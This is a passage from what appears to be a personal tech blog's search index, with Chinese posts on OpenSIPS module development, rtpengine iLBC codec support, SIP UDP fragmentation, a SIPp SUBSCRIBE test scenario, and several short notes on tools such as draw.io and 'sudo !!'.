实际上,str就是__str结构体的别名,可以看出这个结构体有指向字符串的char*类型的指针,以及一个代表字符串长度的len属性。这样做的好处是可以高效的获取字符串的长度,很多有名的开源项目都有类似的结构体。\nopensips几乎所有的字符串都是用的str类型\nparam_export_t param_export_t这个结构体是用来通过脚本里面的modparam向模块传递参数的。这个数组最后一项是{0,0,0} 这最后一项其实是个标志,标志着数组的结束。\nstatic param_export_t params[]={ {\u0026#34;max_limit\u0026#34;, INT_PARAM, \u0026amp;max_limit}, {\u0026#34;local_zone_code\u0026#34;, STR_PARAM, \u0026amp;local_zone_code.s}, {0,0,0} }; 在sr_module_deps.h和sr_module.h中有下面的代码\ntypedef struct param_export_ param_export_t; param_export_t实际上就是param_export_这个结构体的别名。\n这个结构体有三个参数\nname 表示参数的名称 modparam_t 表示参数的类型。参数类型有以下几种 STR_PARAM 字符串类型 INT_PARAM 整数类型 USE_FUNC_PARAM 函数类型
PARAM_TYPE_MASK 这个用到的时候再说 param_pointer 是一个指针,用到的时候再具体说明 struct param_export_ { char* name; /*!","title":"ch4 配置模块的启动参数"},{"content":"从头写一个模块是比较麻烦的,我们可以基于一个简单的模块,然后在这个模块上进行一些修改。\n我们基于maxfwd这个模块,复制一个模块,叫做home_location。\n为什么叫做home_location呢?因为我想根据一个手机号,查出它的归属地,然后根据当地的归属地,判断号码前要不要加0\ncd modules cp -R maxfwd home_location ➜ home_location git:(home_location) ✗ ll total 300K drwxr-xr-x 2 root root 4.0K Apr 20 13:56 doc -rw-r--r-- 1 root root 217 Apr 20 14:00 Makefile -rw-r--r-- 1 root root 4.7K Apr 20 14:00 maxfwd.c -rw-r--r-- 1 root root 2.0K Apr 20 13:56 maxfwd.d -rw-r--r-- 1 root root 77K Apr 20 13:56 maxfwd.o -rwxr-xr-x 1 root root 93K Apr 20 13:56 maxfwd.so -rw-r--r-- 1 root root 4.0K Apr 20 13:56 mf_funcs.c -rw-r--r-- 1 root root 2.1K Apr 20 13:56 mf_funcs.d -rw-r--r-- 1 root root 1.2K Apr 20 13:56 mf_funcs.h -rw-r--r-- 1 root root 84K Apr 20 13:56 mf_funcs.o -rw-r--r-- 1 root root 7.0K Apr 20 13:56 README 下面的操作都是操作home_location目录下的文件。\n修改Makefile NAME改为home_location.so\nNAME=home_location.so 修改maxfwd.c module_exports的结构体的第一个参数,改为home_location 编译home_location模块 上面的操作,其实只是给maxfwd模块改了个名字,没有修改任何具体代码。\n我们在home_location目录下创建一个dev.sh脚本文件,用来做一些快速起停,或者编译模块的事项\ndev.sh #!/bin/bash case $1 in build) cd ../../ pwd; make modules modules=modules/home_location ;; start) killall opensips ulimit -t unlimited sleep 1 /usr/local/sbin/opensips -f ./dev.cfg -w . \u0026amp;\u0026gt; log.txt \u0026amp; echo $? 
;; stop) killall opensips echo stop ;; *) echo bad;; esac chmod +x dev.sh # 用来编译home_location模块 ./dev.sh build # 用来启动opensips, 启动opensips之后,输出的日志会写到log.txt文件中, ./dev.sh start # 用来停止opensips ./dev.sh stop dev.cfg 启动opensips需要一个cfg脚本文件,我们自己做一个简单的\n脚本有以下的注意点:\nloadmodule加载home_location.so我使用了绝对路径,如果在你自己的机器上,目录可能需要修改 log_level=3 log_stderror=yes log_facility=LOG_LOCAL0 debug_mode=no memdump=1 auto_aliases=no listen=udp:0.0.0.0:17634 listen=tcp:0.0.0.0:17634 mpath=\u0026#34;/usr/local/lib64/opensips/modules/\u0026#34; loadmodule \u0026#34;proto_udp.so\u0026#34; loadmodule \u0026#34;proto_tcp.so\u0026#34; loadmodule \u0026#34;mi_fifo.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) loadmodule \u0026#34;/root/code/gitee/opensips/modules/home_location/home_location.so\u0026#34; startup_route{ xlog(\u0026#34;opensips startup\u0026#34;); } route{ xlog(\u0026#34;hello\u0026#34;); } 运行demo ./dev.sh build # 构建脚本 ./dev.sh start # 启动opensips 没有意外的话,opensips启动成功,可以看下log.txt的内容, 也可以通过netstat -nulp | grep opensips 查找opensips的进程\n➜ home_location git:(home_location) ✗ tail log.txt Apr 20 23:00:37 [748389] INFO:core:main: using 2 Mb of private process memory Apr 20 23:00:37 [748389] INFO:core:init_reactor_size: reactor size 1024 (using up to 0.03Mb of memory per process) Apr 20 23:00:37 [748389] INFO:core:evi_publish_event: Registered event \u0026lt;E_CORE_THRESHOLD(0)\u0026gt; Apr 20 23:00:37 [748389] INFO:core:evi_publish_event: Registered event \u0026lt;E_CORE_SHM_THRESHOLD(1)\u0026gt; Apr 20 23:00:37 [748389] INFO:core:evi_publish_event: Registered event \u0026lt;E_CORE_PKG_THRESHOLD(2)\u0026gt; Apr 20 23:00:37 [748389] INFO:core:mod_init: initializing UDP-plain protocol Apr 20 23:00:37 [748389] INFO:core:mod_init: initializing TCP-plain protocol Apr 20 23:00:37 [748389] INFO:home_location:mod_init: initializing... 
Apr 20 23:00:37 [748396] opensips startupApr 20 23:00:37 [748380] INFO:core:daemonize: pre-daemon process exiting with 0 Apr 21 05:32:32 [748410] WARNING:core:handle_timer_job: timer job \u0026lt;blcore-expire\u0026gt; has a 100000 us delay in execution ","permalink":"https://wdd.js.org/opensips/module-dev/l3/","summary":"从头写一个模块是比较麻烦的,我们可以基于一个简单的模块,然后在这个模块上进行一些修改。\n我们基于maxfwd这个模块,复制一个模块,叫做home_location。\n为什么叫做home_location呢?因为我想根据一个手机号,查出它的归属地,然后根据当地的归属地,判断号码前要不要加0\ncd modules cp -R maxfwd home_location ➜ home_location git:(home_location) ✗ ll total 300K drwxr-xr-x 2 root root 4.0K Apr 20 13:56 doc -rw-r--r-- 1 root root 217 Apr 20 14:00 Makefile -rw-r--r-- 1 root root 4.7K Apr 20 14:00 maxfwd.c -rw-r--r-- 1 root root 2.0K Apr 20 13:56 maxfwd.d -rw-r--r-- 1 root root 77K Apr 20 13:56 maxfwd.o -rwxr-xr-x 1 root root 93K Apr 20 13:56 maxfwd.so -rw-r--r-- 1 root root 4.","title":"ch3 复制并裁剪一个模块"},{"content":"环境说明 ubuntu 20.04 opensips 2.4 克隆仓库 由于github官方的仓库clone太慢,最好选择从国内的gitee上克隆。\n下面的gfo, gco, gl, gcb都是oh-my-zsh中git插件的快捷键。建议你要么安装oh-my-zsh, 或者也可以看看这些快捷方式对应的底层命令是什么 https://github.com/ohmyzsh/ohmyzsh/tree/master/plugins/git\ngit clone https://gitee.com/wangduanduan/opensips.git gfo 2.4:2.4 gco 2.4 gl gcb home_location #基于2.4分支创建home_location分支 安装依赖 apt update apt install -y build-essential bison flex m4 pkg-config libncurses5-dev \\ rsyslog libmysqlclient-dev \\ libssl-dev mysql-client libmicrohttpd-dev libcurl4-openssl-dev uuid-dev \\ libpcre3-dev libconfuse-dev libxml2-dev libhiredis-dev 编译安装 make all -j4 include_modules=\u0026#34;db_mysql\u0026#34; make install include_modules=\u0026#34;db_mysql\u0026#34; 测试 ➜ opensips git:(home_location) opensips -V version: opensips 2.4.9 (x86_64/linux) flags: STATS: On, DISABLE_NAGLE, USE_MCAST, SHM_MMAP, PKG_MALLOC, F_MALLOC, FAST_LOCK-ADAPTIVE_WAIT ADAPTIVE_WAIT_LOOPS=1024, MAX_RECV_BUFFER_SIZE 262144, MAX_LISTEN 16, MAX_URI_SIZE 1024, BUF_SIZE 65535 poll method support: poll, epoll, sigio_rt, select. 
git revision: 9c2c8638e main.c compiled on 13:49:33 Apr 20 2021 with gcc 9 ","permalink":"https://wdd.js.org/opensips/module-dev/l2/","summary":"环境说明 ubuntu 20.04 opensips 2.4 克隆仓库 由于github官方的仓库clone太慢,最好选择从国内的gitee上克隆。\n下面的gfo, gco, gl, gcb都是oh-my-zsh中git插件的快捷键。建议你要么安装oh-my-zsh, 或者也可以看看这些快捷方式对应的底层命令是什么 https://github.com/ohmyzsh/ohmyzsh/tree/master/plugins/git\ngit clone https://gitee.com/wangduanduan/opensips.git gfo 2.4:2.4 gco 2.4 gl gcb home_location #基于2.4分支创建home_location分支 安装依赖 apt update apt install -y build-essential bison flex m4 pkg-config libncurses5-dev \\ rsyslog libmysqlclient-dev \\ libssl-dev mysql-client libmicrohttpd-dev libcurl4-openssl-dev uuid-dev \\ libpcre3-dev libconfuse-dev libxml2-dev libhiredis-dev 编译安装 make all -j4 include_modules=\u0026#34;db_mysql\u0026#34; make install include_modules=\u0026#34;db_mysql\u0026#34; 测试 ➜ opensips git:(home_location) opensips -V version: opensips 2.4.9 (x86_64/linux) flags: STATS: On, DISABLE_NAGLE, USE_MCAST, SHM_MMAP, PKG_MALLOC, F_MALLOC, FAST_LOCK-ADAPTIVE_WAIT ADAPTIVE_WAIT_LOOPS=1024, MAX_RECV_BUFFER_SIZE 262144, MAX_LISTEN 16, MAX_URI_SIZE 1024, BUF_SIZE 65535 poll method support: poll, epoll, sigio_rt, select.","title":"ch2 初始化环境"},{"content":"Intro Sonic is a fast, lightweight and schema-less search backend. It ingests search texts and identifier tuples that can then be queried against in a microsecond\u0026rsquo;s time.\ninstall ref https://github.com/valeriansaliou/sonic https://crates.io/crates/sonic-server ","permalink":"https://wdd.js.org/posts/2021/04/kvg1r9/","summary":"Intro Sonic is a fast, lightweight and schema-less search backend. 
It ingests search texts and identifier tuples that can then be queried against in a microsecond\u0026rsquo;s time.\ninstall ref https://github.com/valeriansaliou/sonic https://crates.io/crates/sonic-server ","title":"learn Sonic"},{"content":"今天发现一个问题,按住command + tab, 已经切换到对应的应用图标上,但是松开按键之后,屏幕并没有切换到新的App屏幕上。特别是那些全屏的应用。\n看了很多资料,都是没啥用的,最后发现\nhttps://apple.stackexchange.com/questions/112350/cmdtab-does-not-work-on-hidden-or-minimized-windows 最终发现,需要设置调度中心的 切换到某个应用时,会切换到包含该应用程序的打开的窗口空间, 这个必须要勾选。\n","permalink":"https://wdd.js.org/posts/2021/04/gt9iss/","summary":"今天发现一个问题,按住command + tab, 已经切换到对应的应用图标上,但是松开按键之后,屏幕并没有切换到新的App屏幕上。特别是那些全屏的应用。\n看了很多资料,都是没啥用的,最后发现\nhttps://apple.stackexchange.com/questions/112350/cmdtab-does-not-work-on-hidden-or-minimized-windows 最终发现,需要设置调度中心的 切换到某个应用时,会切换到包含该应用程序的打开的窗口空间, 这个必须要勾选。","title":"command + tab 无法切换窗口了?"},{"content":"ilbc编码的特点是占用带宽小,并且抗丢包。但是rtpengine是不支持ilbc编码的,可以参考的资料有以下两个\nhttps://github.com/sipwise/rtpengine/issues/897 https://sr-users.sip-router.narkive.com/f3jhDeyU/rtpengine-and-ilbc-support 使用rtpengine --codecs可以打印出rtpengine支持的编解码\nrtpengine --codecs PCMA: fully supported PCMU: fully supported G723: fully supported G722: fully supported QCELP: supported for decoding only G729: supported for decoding only speex: fully supported GSM: fully supported iLBC: not supported opus: fully supported vorbis: fully supported ac3: fully supported eac3: fully supported ATRAC3: supported for decoding only ATRAC-X: supported for decoding only AMR: fully supported AMR-WB: fully supported PCM-S16LE: fully supported MP3: fully supported 下面的操作基于debian:9-slim的基础镜像构建的,在构建rtpengine之前,我们先编译ilbc的依赖库\nRUN echo \u0026#34;deb http://www.deb-multimedia.org stretch main\u0026#34; \u0026gt;\u0026gt; /etc/apt/sources.list \\ \u0026amp;\u0026amp; apt-get update \\ \u0026amp;\u0026amp; apt-get install deb-multimedia-keyring -y --allow-unauthenticated \\ \u0026amp;\u0026amp; apt-get install libilbc-dev libavcodec-dev libilbc2 -y --allow-unauthenticated 
安装依赖之后,继续构建rtpengine, rtpengine构建完之后,执行rtpengine --codecs\n","permalink":"https://wdd.js.org/opensips/ch9/rtpengine-ilbc/","summary":"ilbc编码的特点是占用带宽小,并且抗丢包。但是rtpengine是不支持ilbc编码的,可以参考的资料有以下两个\nhttps://github.com/sipwise/rtpengine/issues/897 https://sr-users.sip-router.narkive.com/f3jhDeyU/rtpengine-and-ilbc-support 使用rtpengine --codecs可以打印出rtpengine支持的编解码\nrtpengine --codecs PCMA: fully supported PCMU: fully supported G723: fully supported G722: fully supported QCELP: supported for decoding only G729: supported for decoding only speex: fully supported GSM: fully supported iLBC: not supported opus: fully supported vorbis: fully supported ac3: fully supported eac3: fully supported ATRAC3: supported for decoding only ATRAC-X: supported for decoding only AMR: fully supported AMR-WB: fully supported PCM-S16LE: fully supported MP3: fully supported 下面的操作基于debian:9-slim的基础镜像构建的,在构建rtpengine之前,我们先编译ilbc的依赖库","title":"rtpengine 增加对ilbc编解码的支持"},{"content":"当你需要解释一个概念的时候,图形化的展示是最容易让人理解的方式。\n以前我一直用processon来绘制, processon的优点很多,用过的都知道。\n但是缺点也是非常明显的。\n定价过高 不支持离线使用 虽然processon的使用体验还不错,但是对我个人来说,使用的频率并不高 免费的会员最多只有19个文件可以使用 有一年,我的文件超过了19个,我就只能买会员了。会员到期后,我就没有续费,因为使用的频率太低。\n关于processon定价 我们横向对比一下几个互联网产品的收费标准, 从下表可以看出,Processon的定价不菲。\n项目 收费标准 最低年费用 processon 升级到个人版 159/年 159 语雀会员 标准99 限时特惠69/年 69 印象笔记 - 标准 8.17/月- 高级 12.33/月- 专业 16.50/月 - 标准 98- 高级 148- 专业 198 b站大会员 连续包年 6.3折 148/年 - 148 爱奇艺 - 黄金VIP会员 首年138/年,次年续费218 - 138 网易云音乐 - 连续包年 99 - 99 draw.io 是什么 draw.io的功能涵盖了processon的很多功能,但是其最大的卖点是**免费。(**圈住,要考!)\n但是免费的东西不好用,也不一定有人会用。但是draw.io在免费的基础上,做到了使用体验还不错,这就难能可贵了。\n最早接触的是draw.io的在线版,直到最近才发现,原来draw.io也有桌面客户端的,而且还可以离线使用。\n太爽了,果断下载体验。\n下载地址:https://github.com/jgraph/drawio-desktop/releases\n从release Notes上可以看出,draw.io的客户端基本上是全平台兼容了, 因为是基于Electron做的,不想兼容都不行啊!\n","permalink":"https://wdd.js.org/posts/2021/04/zf3xgd/","summary":"当你需要解释一个概念的时候,图形化的展示是最容易让人理解的方式。\n以前我一直用processon来绘制, processon的优点很多,用过的都知道。\n但是缺点也是非常明显的。\n定价过高 不支持离线使用 虽然processon的使用体验还不错,但是对我个人来说,使用的频率并不高 免费的会员最多只有19个文件可以使用 
有一年,我的文件超过了19个,我就只能买会员了。会员到期后,我就没有续费,因为使用的频率太低。\n关于processon定价 我们横向对比一下几个互联网产品的收费标准, 从下表可以看出,Processon的定价不菲。\n项目 收费标准 最低年费用 processon 升级到个人版 159/年 159 语雀会员 标准99 限时特惠69/年 69 印象笔记 - 标准 8.17/月- 高级 12.33/月- 专业 16.50/月 - 标准 98- 高级 148- 专业 198 b站大会员 连续包年 6.3折 148/年 - 148 爱奇艺 - 黄金VIP会员 首年138/年,次年续费218 - 138 网易云音乐 - 连续包年 99 - 99 draw.io 是什么 draw.io的功能涵盖了processon的很多功能,但是其最大的卖点是**免费。(**圈住,要考!)\n但是免费的东西不好用,也不一定有人会有。但是draw.io在免费的基础上,做到了使用体验还不错,这就难能可贵了。\n最早接触的是draw.io的在线版,直到最近才发现,原来draw.io也有桌面客户端的,而且还可以离线使用。\n太爽了,果断下载体验。\n下载地址:https://github.com/jgraph/drawio-desktop/releases\n从release Notes上可以看出,draw.io的客户端基本上是全平台兼容了, 因为是基于Electron做的,不想兼容都不行啊!","title":"draw.io居然有桌面客户端了"},{"content":"最近几个月,一直有些不顺心的事情让我烦恼。\n下了扶梯,走在站台上往火车上,往二号车厢走去。同行的陌生人行色匆匆,无一逗留。\n动车的车头上,不知道是碰到了什么东西,染了一大片黄色的污渍,仿佛是撞到不知名的动物而留下的痕迹。车灯宛如一个大号的三角眼,直勾勾的往前望着,不知道在再想些什么。\n突然我的脑子里迸射出一个问题: 人为什么活着?\n记得以前课本上说,人和动物的区别是人会使用工具。但是我想在觉得,人和动物的区别应该是,人会问自己: 我什么活着。而动物凭本能行动,似乎并不会考虑活着这么深奥的问题。\n一只蚂蚁在一根绳爬,只有两个方向,要么前进,要么后退。有个蚂蚁似乎发现了第三个方向,就是可以绕着绳子转圈圈。而会转圈圈的蚂蚁,似乎就是那个容易烦恼的蚂蚁。\n这是我第一次考虑人为什么活着这个问题。回首过去,我觉得自己是个动物,凭借本能生活,饿了就吃,累了就睡。\n感觉每一天都是一个周期函数,永不停止的重复上下波动。\n最近刚好对声纹识别有些兴趣,在这个领域,有个技术叫做傅里叶变换。就是把一个时域的信号转换成频域的信号。实际的物理作用并没有变化,只是看待事物的角度发生变化,而看到的东西却不一样了。\n我觉得我也需要对我的生活做个傅里叶变换,找到一些能解决我困惑的答案。\n","permalink":"https://wdd.js.org/posts/2021/04/qb6asq/","summary":"最近几个月,一直有些不顺心的事情让我烦恼。\n下了扶梯,走在站台上往火车上,往二号车厢走去。同行的陌生人行色匆匆,无一逗留。\n动车的车头上,不知道是碰到了什么东西,染了一大片黄色的污渍,仿佛是撞到不知名的动物而留下的痕迹。车灯宛如一个大号的三角眼,直勾勾的往前望着,不知道在再想些什么。\n突然我的脑子里迸射出一个问题: 人为什么活着?\n记得以前课本上说,人和动物的区别是人会使用工具。但是我想在觉得,人和动物的区别应该是,人会问自己: 我什么活着。而动物凭本能行动,似乎并不会考虑活着这么深奥的问题。\n一只蚂蚁在一根绳爬,只有两个方向,要么前进,要么后退。有个蚂蚁似乎发现了第三个方向,就是可以绕着绳子转圈圈。而会转圈圈的蚂蚁,似乎就是那个容易烦恼的蚂蚁。\n这是我第一次考虑人为什么活着这个问题。回首过去,我觉得自己是个动物,凭借本能生活,饿了就吃,累了就睡。\n感觉每一天都是一个周期函数,永不停止的重复上下波动。\n最近刚好对声纹识别有些兴趣,在这个领域,有个技术叫做傅里叶变换。就是把一个时域的信号转换成频域的信号。实际的物理作用并没有变化,只是看待事物的角度发生变化,而看到的东西却不一样了。\n我觉得我也需要对我的生活做个傅里叶变换,找到一些能解决我困惑的答案。","title":"人为什么活着"},{"content":" 现象 有了开源的框架,我们可以很方便的运行一个VOIP系统。但是维护一个VOIP系统并非那么简单。特别是如果经常出现一些偶发的问题,需要用经验丰富的运维人员来从不同层面分析。\n其中UDP分片,也可能是原因之一。\n简介 
以太网的最大MTU一般是1500字节,减去20字节的IP首部,8字节的UDP首部,UDP能承载的数据最大是1472字节。\n如果一个SIP消息的报文超过1472就会分片。(实际上,如果网络的MTU比1500更小,那么达到分片的尺寸也会变小)\n如下图,发送方通过以太网发送了4个报文,ABCD。其中D报文太大了,而被分割成了三个报文。在传输过程中,D的一个分片丢失,接收方由于无法重新组装D报文,所以就将D报文的所有分片都丢弃。\n这将会导致以下问题\n发送方因接收不到响应,所以产生了重传 丢弃的分片导致其他的分片浪费了带宽 IP分片对发送者来说是简单的,但是对于接收者来说,分片的组装将会占用更多的资源 RFC 3261中给出建议,某些情况下可以使用TCP来传输。\n当MTU是未知的情况下,如果消息超过1300字节,则选择使用TCP传输 当MTU是已知情况下,SIP的消息的大小如果大于MTU-200, 则需要使用TCP传输。留下200字节的余量,是因为SIP消息的响应可能大于SIP消息的请求,为了避免响应消息超过MTU,所以要留下200字节的余量。 If a request is within 200 bytes of the path MTU, or if it is larger than 1300 bytes and the path MTU is unknown, the request MUST be sent\nusing an RFC 2914 [43] congestion controlled transport protocol, such\nas TCP. If this causes a change in the transport protocol from the\none indicated in the top Via, the value in the top Via MUST be\nchanged. This prevents fragmentation of messages over UDP and\nprovides congestion control for larger messages. However,\nimplementations MUST be able to handle messages up to the maximum\ndatagram packet size. For UDP, this size is 65,535 bytes, including\nIP and UDP headers.\nThe 200 byte \u0026ldquo;buffer\u0026rdquo; between the message size and the MTU\naccommodates the fact that the response in SIP can be larger than\nthe request. This happens due to the addition of Record-Route\nheader field values to the responses to INVITE, for example. With\nthe extra buffer, the response can be about 170 bytes larger than\nthe request, and still not be fragmented on IPv4 (about 30 bytes is consumed by IP/UDP, assuming no IPSec). 1300 is chosen when\npath MTU is not known, based on the assumption of a 1500 byte\nEthernet MTU. 
RFC 3261 18.1.1\n但是使用TCP来传输也有缺点,就是比使用UDP更占用资源。\n如何发现问题 用tcpdump在路径中抓包,然后使用wireshark分析抓包文件的大小分布。\n如何减少包的尺寸 移除无用的SIP头或者无用的SDP信息, 以opensips脚本为例子 # 可以通过$ml来获取消息的长度 if ($ml \u0026gt; 1300) { xlog(\u0026#34;L_WARN\u0026#34;,\u0026#34;$ci $rm $si $fu: message big then 1300: $ml\u0026#34;); } if ($ml \u0026gt;= 1500) { xlog(\u0026#34;L_ERR\u0026#34;,\u0026#34;$ci $rm $si $fu: message to big than 1500 $ml\u0026#34;); sl_send_reply(\u0026#34;513\u0026#34;,\u0026#34;Message too big\u0026#34;); } # 可以通过remove_hf和codec_delete来移除多余的消息 if(is_present_hf(\u0026#34;User-Agent\u0026#34;)) { remove_hf(\u0026#34;User-Agent\u0026#34;); } if (codec_exists(\u0026#34;Speex\u0026#34;)) { codec_delete(\u0026#34;Speex\u0026#34;); } 使用SIP头压缩技术,opensips中也有头压缩的模块 注意不要在脚本中随意使用append_hf去给SIP消息增加头 参考 https://www.yay.com/faq/voip-network/udp-maximum-mtu-size/ https://www.ibm.com/support/pages/sending-large-sip-request-exceeds-mtu-value-might-not-switch-udp-tcp http://www.rfcreader.com/#rfc3261_line6474 https://www.ecg.co/blog/125-sip-and-fragments-together-forever https://en.wikipedia.org/wiki/IP_fragmentation https://thomas.gelf.net/blog/archives/Smaller-SIP-packets-to-avoid-fragmentation,27.html http://www.evaristesys.com/blog/sip-udp-fragmentation-and-kamailio-the-sip-header-diet/ ","permalink":"https://wdd.js.org/opensips/ch7/big-udp-msg/","summary":"现象 有了开源的框架,我们可以很方便的运行一个VOIP系统。但是维护一个VOIP系统并非那么简单。特别是如果经常出现一些偶发的问题,需要用经验丰富的运维人员来从不同层面分析。\n其中UDP分片,也可能是原因之一。\n简介 以太网的最大MTU一般是1500字节,减去20字节的IP首部,8字节的UDP首部,UDP能承载的数据最大是1472字节。\n如果一个SIP消息的报文超过1472就会分片。(实际上,如果网络的MTU比1500更小,那么达到分片的尺寸也会变小)\n如下图,发送方通过以太网发送了4个报文,ABCD。其中D报文太大了,而被分割成了三个报文。在传输过程中,D的一个分片丢失,接收方由于无法重新组装D报文,所以就将D报文的所有分片都丢弃。\n这将会导致以下问题\n发送方因接收不到响应,所以产生了重传 丢弃的分片导致其他的分片浪费了带宽 IP分片对发送者来说是简单的,但是对于接收者来说,分片的组装将会占用更多的资源 RFC 3261中给出建议,某些情况下可以使用TCP来传输。\n当MTU是未知的情况下,如果消息超过1300字节,则选择使用TCP传输 当MTU是已知情况下,SIP的消息的大小如果大于MTU-200, 则需要使用TCP传输。留下200字节的余量,是因为SIP消息的响应可能大于SIP消息的请求,为了避免响应消息超过MTU,所以要留下200字节的余量。 If a request is within 200 bytes of the path MTU, or if it is 
larger than 1300 bytes and the path MTU is unknown, the request MUST be sent\nusing an RFC 2914 [43] congestion controlled transport protocol, such\nas TCP. If this causes a change in the transport protocol from the","title":"UDP分片导致SIP消息丢失"},{"content":"在ubuntu上执行命令,经常会出现下面的报错:\ntcpdump: eno1: You don\u0026#39;t have permission to capture on that device (socket: Operation not permitted) 这种报错一般是执行命令时,没有加上sudo\n快速的解决方案是:\n按向上箭头键 ctrl+a 光标定位到行首 输入sudo 按回车 上面的步骤是比较快的补救方案,但是因为向上的箭头一般布局在键盘的右下角,不移动手掌就够不着。一般输入向上的箭头时,右手会离开键盘的本位,会低头看下键盘,找下向上的箭头的位置。\n有没有右手不离开键盘本位,不需要低头看键盘的解决方案呢?\n答案就是: sudo !! !!会被解释成为上一条执行的命令。sudo !!就会变成使用sudo执行上一条命令。\n快试试看吧 sudo bang bang\n","permalink":"https://wdd.js.org/posts/2021/04/nqs50g/","summary":"在ubuntu上执行命令,经常会出现下面的报错:\ntcpdump: eno1: You don\u0026#39;t have permission to capture on that device (socket: Operation not permitted) 这种报错一般是执行命令时,没有加上sudo\n快速的解决方案是:\n按向上箭头键 ctrl+a 光标定位到行首 输入sudo 按回车 上面的步骤是比较快的补救方案,但是因为向上的箭头一般布局在键盘的右下角,不移动手掌就够不着。一般输入向上的箭头时,右手会离开键盘的本位,会低头看下键盘,找下向上的箭头的位置。\n有没有右手不离开键盘本位,不需要低头看键盘的解决方案呢?\n答案就是: sudo !! 
!!会被解释成为上一条执行的命令。sudo !!就会变成使用sudo执行上一条命令。\n快试试看吧 sudo bang bang","title":"sudo !!的妙用"},{"content":"时序图 场景解释 step1: SUBSCRIBE 客户端想要订阅某个分机的状态 step2: 200 Ok 服务端接受了这个订阅消息 step3: NOTIFY 服务端向客户端返回他的订阅目标的状态 step4: 200 Ok 客户端返回表示接受 场景文件 \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;iso-8859-2\u0026#34; ?\u0026gt; \u0026lt;!DOCTYPE scenario SYSTEM \u0026#34;sipp.dtd\u0026#34;\u0026gt; \u0026lt;scenario name=\u0026#34;subscibe wait notify\u0026#34;\u0026gt; \u0026lt;send retrans=\u0026#34;500\u0026#34;\u0026gt; \u0026lt;![CDATA[ SUBSCRIBE sip:[my_monitor]@[my_domain] SIP/2.0 Via: SIP/2.0/[transport] [local_ip]:[local_port];branch=[branch] From: sipp \u0026lt;sip:[my_ext]@[my_domain]\u0026gt;;tag=[call_number] To: \u0026lt;sip:[my_monitor]@[my_domain]:[remote_port]\u0026gt; Call-ID: [call_id] CSeq: [cseq] SUBSCRIBE Contact: sip:[my_ext]@[local_ip]:[local_port] Max-Forwards: 10 Event: dialog Expires: 120 User-Agent: SIPp/Win32 Accept: application/dialog-info+xml, multipart/related, application/rlmi+xml Content-Length: 0 ]]\u0026gt; \u0026lt;/send\u0026gt; \u0026lt;recv response=\u0026#34;200\u0026#34; rtd=\u0026#34;true\u0026#34;\u0026gt; \u0026lt;/recv\u0026gt; \u0026lt;recv request=\u0026#34;NOTIFY\u0026#34; crlf=\u0026#34;true\u0026#34; rrs=\u0026#34;true\u0026#34;\u0026gt; \u0026lt;/recv\u0026gt; \u0026lt;send\u0026gt; \u0026lt;![CDATA[ SIP/2.0 200 OK [last_Via:] [last_From:] [last_To:] [last_Call-ID:] [last_CSeq:] Content-Length: 0 ]]\u0026gt; \u0026lt;/send\u0026gt; \u0026lt;!-- \u0026lt;nop\u0026gt; \u0026lt;action\u0026gt; \u0026lt;exec int_cmd=\u0026#34;stop_now\u0026#34;/\u0026gt; \u0026lt;/action\u0026gt; \u0026lt;/nop\u0026gt; --\u0026gt; \u0026lt;!-- definition of the response time repartition table (unit is ms) --\u0026gt; \u0026lt;ResponseTimeRepartition value=\u0026#34;10, 20, 30, 40, 50, 100, 150, 200\u0026#34;/\u0026gt; \u0026lt;!-- definition of the call length repartition table (unit is ms) --\u0026gt; \u0026lt;CallLengthRepartition 
value=\u0026#34;10, 50, 100, 500, 1000, 5000, 10000\u0026#34;/\u0026gt; \u0026lt;/scenario\u0026gt; 定义配置文件 #!/bin/bash # conf.sh edge_address=\u0026#39;192.168.40.88:18627\u0026#39; my_ext=\u0026#39;8003\u0026#39; my_domain=\u0026#39;ss.cc\u0026#39; my_monitor=\u0026#39;8004\u0026#39; 定义状态码处理函数 用来处理来自sipp的返回的状态码\n#!/bin/bash # util.sh log_error () { case $1 in 0) echo INFO: test success ;; 1) echo ERROR: At least one call failed ;; 97) echo ERROR: Exit on internal command. Calls may have been processed ;; 99) echo ERROR: Normal exit without calls processed ;; -1) echo ERROR: Fatal error ;; -2) echo ERROR: Fatal error binding a socket ;; *) echo ERROR: Unknown exit code $1 ;; esac } 启动文件 -key 用来定义变量,在场景文件中存在三个变量 [my_ext] 当前分机号 [my_domain] 当前分机域名 [my_monitor] 当前分机想要监控的分机号 -recv_timeout 表示设置接受消息的超时时间为1000毫秒 -timeout 设置整个运行过程的超时时间 -sf 指定场景文件 -m 设置最大处理的呼叫数 -l 设置并发呼叫数量 -r 设置呼叫速度 #!/bin/bash # test.sh source ../util.sh source ./conf.sh rm *.log sipp -trace_logs $edge_address \\ -key my_ext $my_ext \\ -key my_domain $my_domain \\ -key my_monitor $my_monitor \\ -recv_timeout 1000 \\ -timeout 2 \\ -sf ./subscibe.xml -m 1 -l 1 -r 1; log_error $? 
执行测试: chmod +x test.sh ./test.sh sngrep 抓包 ","permalink":"https://wdd.js.org/opensips/tools/sipp-subscriber/","summary":"时序图 场景解释 step1: SUBSCRIBE 客户端想要订阅某个分机的状态 step2: 200 Ok 服务端接受了这个订阅消息 step3: NOTIFY 服务端向客户端返回他的订阅目标的状态 step4: 200 Ok 客户端返回表示接受 场景文件 \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;iso-8859-2\u0026#34; ?\u0026gt; \u0026lt;!DOCTYPE scenario SYSTEM \u0026#34;sipp.dtd\u0026#34;\u0026gt; \u0026lt;scenario name=\u0026#34;subscibe wait notify\u0026#34;\u0026gt; \u0026lt;send retrans=\u0026#34;500\u0026#34;\u0026gt; \u0026lt;![CDATA[ SUBSCRIBE sip:[my_monitor]@[my_domain] SIP/2.0 Via: SIP/2.0/[transport] [local_ip]:[local_port];branch=[branch] From: sipp \u0026lt;sip:[my_ext]@[my_domain]\u0026gt;;tag=[call_number] To: \u0026lt;sip:[my_monitor]@[my_domain]:[remote_port]\u0026gt; Call-ID: [call_id] CSeq: [cseq] SUBSCRIBE Contact: sip:[my_ext]@[local_ip]:[local_port] Max-Forwards: 10 Event: dialog Expires: 120 User-Agent: SIPp/Win32 Accept: application/dialog-info+xml, multipart/related, application/rlmi+xml Content-Length: 0 ]]\u0026gt; \u0026lt;/send\u0026gt; \u0026lt;recv response=\u0026#34;200\u0026#34; 